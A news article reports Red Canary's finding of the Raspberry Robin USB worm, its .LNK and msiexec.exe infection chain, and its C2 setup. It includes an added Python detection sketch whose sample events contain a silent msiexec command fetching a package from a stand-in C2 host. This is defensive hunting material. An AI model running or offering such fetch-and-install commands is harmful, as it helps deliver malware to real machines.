May 26, 2022
New Raspberry Robin Malware Attacks Windows PCs through Infected USB Devices

Cyber Security Experts Find a New Malware Attacking Windows PCs via Infected USB Devices but Don’t Know Why

Cyber security experts have discovered a new malware they call Raspberry Robin, which damages PCs via infected USB devices, but they don’t know the purpose…

Security researchers have recently uncovered a new form of malware that’s deployed via corrupted USB devices to infect Windows machines. The experts at Red Canary found the worm-like virus spreading offline, and it appears to be linked to a “cluster of malicious activity.” However, at this time, not a whole lot is known about this particular threat campaign or its end goals.

After security experts analyzed one infected thumb drive, they learned the worm spreads to new devices through a malicious .LNK file. Once a potential victim plugs in the infected USB drive, the malicious code triggers a new process through cmd.exe and runs the file. It also uses Microsoft Standard Installer (msiexec.exe) to reach out to its C2 server. Security researchers speculate the server is hosted on a compromised QNAP device, with TOR exit nodes being used as extra C2 infrastructure. Still, its endgame isn’t yet known:

“While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware. Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes. Absent additional information on later-stage activity, it’s difficult to make inferences on the goal or goals of these campaigns.”
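
The msiexec.exe behaviour described above can be hunted in process-creation telemetry. The sketch below is an added example, not code from Red Canary or from this article: the event fields, PIDs, paths and `example.invalid` hosts are constructed, and rating a cmd.exe ancestor as the higher-confidence case is an assumption based on the chain the article describes.

```python
import re
from ntpath import basename
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed process-creation events (fields modeled on Sysmon Event ID 1).
# Paths, PIDs and the *.example.invalid hosts are made up for this example.
EVENTS = [
    {"pid": 10, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 20, "ppid": 10, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd.exe /c E:\sample.bin"},
    {"pid": 30, "ppid": 20, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": "msiexec.exe /q /i http://c2.example.invalid:8080/x"},
    {"pid": 40, "ppid": 10, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec.exe /i C:\Temp\setup.msi"},
    {"pid": 50, "ppid": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": "MsiExec.exe /i https://downloads.example.invalid/agent.msi /qn"},
]

def name(event):
    """Lower-cased executable name taken from a Windows image path."""
    return basename(event["image"]).lower()

def has_cmd_ancestor(event, by_pid):
    """Walk the parent chain looking for cmd.exe; guard against PID loops."""
    seen = set()
    parent = by_pid.get(event["ppid"])
    while parent and parent["pid"] not in seen:
        if name(parent) == "cmd.exe":
            return True
        seen.add(parent["pid"])
        parent = by_pid.get(parent["ppid"])
    return False

def detect(events):
    """Flag msiexec.exe launches whose command line names a remote URL."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if name(e) != "msiexec.exe":
            continue
        match = URL_RE.search(e["cmd"])
        if not match:
            continue  # local package: ordinary installer behaviour
        host = urlsplit(match.group(0)).hostname
        # Assumption: a cmd.exe ancestor matches the chain the article describes.
        level = "high" if has_cmd_ancestor(e, by_pid) else "review"
        findings.append({"pid": e["pid"], "host": host, "level": level})
    return findings

if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

Because msiexec.exe also fetches legitimate packages over HTTP, the "review" level is a triage queue rather than a verdict; comparing the extracted host against the organization's known software sources narrows it further.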

Ashley Lipman

Ashley Lipman is a super-connector with Outreachmama who helps businesses find their audience online through outreach, partnerships, and networking.
